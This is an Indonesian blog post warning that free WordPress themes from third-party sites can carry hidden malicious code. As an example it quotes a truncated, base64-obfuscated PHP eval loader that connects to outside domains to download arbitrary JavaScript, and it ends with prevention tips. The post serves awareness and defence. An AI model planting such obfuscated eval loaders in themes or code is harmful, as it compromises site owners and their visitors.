Beberapa waktu ke belakang saya mencari dan mendownload banyak theme (template) untuk wordpress dari berbagai situs. Dengan tampilan yang menarik, siapa yang tak tergoda untuk memilikinya (atau sekadar menjadikannya inspirasi untuk mendesain CSS). Tapi suatu waktu saya menemukan sebuah artikel dari 5ThirtyOne yang mengatakan bahwa saat ini terdapat beberapa situs penyedia theme wordpress gratis yang menyisipkan kode-kode berbahaya di dalamnya. Ini terjadi di akhir tahun 2007 lalu, tapi mungkin ada yang belum tahu tentang itu, so, saya lanjut.

Derek Punsalan, si pemilik 5ThirtyOne, menyadari hal itu ketika dia sedang mencari di situs mana saja theme wordpress gratis buatannya di-host. Pada Do not download WordPress themes distributed by 3rd party sites, Derek memberikan salah satu contoh dari skrip/kode berbahaya itu:

@eval(@base64_decode(’aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3Q\
jY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20i\
LCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiw\
gJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICR\
SNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3I\
iOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMD\
kxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMk\
QwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1Qj\
M5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRj\
EyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNT\
[...]

Derek mengatakan bahwa theme berisi kode itu Ia ambil dari WP Sphere, si situs terkutuk.

Menyimpulkan hasil temuan Derek dan Paul Carroll yang mengurai apa yang tersembunyi dalam kode tersebut, Gigaom.com, menulis:

The first part of the string offers a clue: It’s using a PHP function to decode the string of text, which is encoded as base64. If we pass this through a decoder, the string looks a lot more malicious:

The code establishes a connection from the WordPress server to several sites wpssr.com, wpsnc.com, and wpsnc2.com, and allows the site operator to download an arbitrary piece of Javascript. The sites are registered to an anonymous registrar in Vancouver, British Columbia.

Kode tersebut tampaknya menggunakan fungsi PHP untuk mendekode teks yang dienkode sebagai base64 (I don’t know what the hell that supposed to mean). Yang pasti, kode itu dicurigai bisa melakukan koneksi dari server wordpress ke beberapa situs seperti wpssr.com, wpsnc.com dan wpsnc2.com dan memungkinkan operator situs untuk mengunduh Javascript dari sana.

Akibat merugikan dari koneksi tersembunyi seperti itu menurut Paul Carroll cukup jelas. Karena kode tadi bisa melakukan pemantauan dari data-data pengunjung, kode semacam itu bisa digunakan pihak tertentu untuk mengirimkan spam atau melakukan phising, baik ke blog pengguna theme atau bahkan ke komputer pengunjung blog.

I think the potential for abuse of this script is huge. I see it as a covert channel to setup Word Press enabled sites as thin zombies. The code being sent back to the server and eval’d could be a mailing script for spam or phishing.

Beberapa langkah preventif agar tidak dimata-matai oleh kelompok-kelompok “hitam” macam itu, langkah terbaik adalah menggunakan theme dari situs yang memfasilitasi keterlibatan publik yang lebih luas dalam pengembangannya. Seperti http://themes.wordpress.net/ atau http://wordpress.org/extend/themes/ atu situs lain yang dikenal memiliki reputasi baik. Lebih bagus lagi kalau kita cukup penasaran untuk melihat-lihat kode sumber (source code)-nya terlebih dahulu.

Yah.. Siapa juga yang suka dimata-matain orang? Cape deh..